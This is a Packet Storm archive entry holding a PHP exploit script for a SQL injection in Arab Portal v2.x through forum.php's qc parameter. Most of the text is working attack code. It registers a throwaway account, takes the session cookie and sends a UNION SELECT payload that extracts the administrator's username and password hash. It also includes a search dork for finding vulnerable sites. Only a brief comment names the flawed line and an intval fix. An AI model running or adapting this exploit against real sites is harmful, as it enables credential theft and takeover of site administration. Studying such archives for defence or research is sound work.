Arab Portal 2.x SQL Injection

2009-08-05T00:00:00
ID PACKETSTORM:79995
Type packetstorm
Reporter rEcruit
Modified 2009-08-05T00:00:00

Description

                                        
                                            `<?  
  
/*  
  
[ Arab Portal v2.x (forum.php qc) SQL Injection Exploit ]  
  
[-] Author : rEcruit  
[-] Mail : recru1t@ymail.com  
[-] Download : http://arab-portal.net/download.php  
  
[-] Vuln in ./forum.php Line: 1503  
  
[code]  
  
if((isset($apt->get[qc])) &&(!isset($apt->get[qp])))  
{  
$qc = $apt->get[qc];   
$result = $apt->query("select name,comment from rafia_comment where id='$qc'");  
$row = $apt->dbarray($result);  
$apt->row['quote'] = "\n\n\n[QUOTE]..... :".$row['name']."\n".$row['comment']."[/QUOTE]";  
}  
  
[/code]  
  
  
[-] Debug :  
  
[code]  
$qc = intval($apt->get[qc]);   
[/code]  
  
[-] Note : Path to Control Panel "/admin/" .  
  
[-] Condition : magic_quotes_gpc = Off  
  
*/  
  
error_reporting(0);  
ini_set("max_execution_time",0);  
ini_set("default_socket_timeout",5);  
  
function Usage()  
{  
print "\n\n";  
print "/------------------------------------------------------------\\\n";  
print "| Arab Portal v2.x (forum.php qc) SQL Injection Exploit |\n";  
print "\------------------------------------------------------------/\n";  
print "| [-] Author : rEcruit |\n";  
print "| [-] Mail : recru1t@ymail.com |\n";  
print "| [-] Greetz : Evil-Cod3r , BlaCK MooN , Fantastic Egypt |\n";  
print "| ALL Sec-Sni.coM Members |\n";  
print "\------------------------------------------------------------/\n";  
print "| [-] Dork : \"Powered by: Arab Portal v2\" |\n";  
print "| [+] Usage : php Exploit.php HOST PATH Options |\n";  
print "| [-] HOST : Target server (ip/hostname) |\n";  
print "| [-] PATH : Path to Arab Portal |\n";  
print "| [-] Options : |\n";  
print "| =>Proxy :(ex. 0.0.0.0:8080) |\n";  
print "\------------------------------------------------------------/\n";  
print "\n\n";  
  
exit;  
}  
  
function Send($Packet,$Payload=false)  
{  
Global $host,$proxy;  
  
if(empty($proxy))  
{  
$Connect = @fsockopen($host,"80") or die("[-] Bad Host .");  
}else{  
$proxy = explode(":",$proxy);  
$Connect = @fsockopen($proxy[0],$proxy[1]) or die("[-] Bad Proxy .");  
}  
  
$Packet .= "Host : {$host} \r\n";  
$Packet .= "X-Forwarded-For: 127.0.0.1\r\n";  
$Packet .= "Content-Type: application/x-www-form-urlencoded\r\n";  
$Packet .= "Content-Length: ".(strlen($Payload))."\r\n";  
$Packet .= "Connection: close\r\n\r\n";  
$Packet .= $Payload;  
  
fputs($Connect,$Packet);  
  
while(!feof($Connect))   
$Response .= @fgets($Connect,2048);  
  
fclose($Connect);  
  
return $Response;  
}  
  
function SignUp()  
{  
  
GLOBAL $username,$password,$email,$host,$path;  
  
$Payload = "username={$username}&password={$password}&password2={$password}&email={$email}&email2={$email}&homepage=http://&viewemail=0&showemail=1&html_msg=0&usertheme=portal&spam=regnotspam&remain=279&post={$email}&left=279&I1.x=72&I1.y=6";  
$Packet .= "POST {$path}/members.php?action=insert HTTP/1.1 \r\n";  
$Packet .= "Referer: http://{$host}/{$path}/members.php?action=signup \r\n";  
  
return Send($Packet,$Payload);  
}  
  
function Login_Packet()  
{  
  
GLOBAL $username,$password,$host,$path;  
  
$Payload = "username={$username}&userpass={$password}";  
$Packet .= "POST {$path}/members.php?action=login HTTP/1.1 \r\n";  
$Packet .= "Referer: http://{$host}/{$path}/forum.php\r\n";  
  
return Send($Packet,$Payload);  
}  
  
function SI_Packet()  
{  
  
GLOBAL $host,$path,$cookie;  
  
  
$Packet .= "GET {$path}/forum.php?action=addcomment&id=1&qc=-999'+UNION+ALL+SELECT+1,concat(0x313a3a,username,0x3a3a,password,0x3a3a)+FROM+rafia_users+where+userid='1 HTTP/1.1 \r\n";  
$Packet .= "Host : {$host} \r\n";  
$Packet .= "{$cookie} \r\n";  
$Packet .= "Referer: http://{$host}/{$path}/forum.php\r\n";  
  
return Send($Packet);  
}  
  
function getCookie($Packet)  
{  
$lines = explode("\r\n",$Packet);  
for($i = 0; $i < sizeof($lines); $i++)  
{  
$line = $lines[$i];  
if(ereg("PHPSESSID=",$line))  
{  
$cookie = str_replace("Set-Cookie","Cookie",$line);  
break;  
}  
}  
return $cookie;  
}  
  
  
if ($argc < 3) Usage();  
  
$host = $argv[1];  
$path = $argv[2];  
$proxy = $argv[3];  
  
  
$username = "user".rand(0,10000);  
$password = "pwd".rand(0,10000);  
$email = "email".rand(0,10000)."@yahoo.com";  
  
  
Print "\r\n[-] Connecting to {$host} .... \r\n\r\n";  
  
SignUp();  
  
$cookie = getCookie(Login_Packet());  
  
$data = split("::",SI_Packet());  
  
Print "[-] Username : $data[1]\r\n";  
Print "[-] Password : $data[2]\r\n";  
  
  
?>  
  
`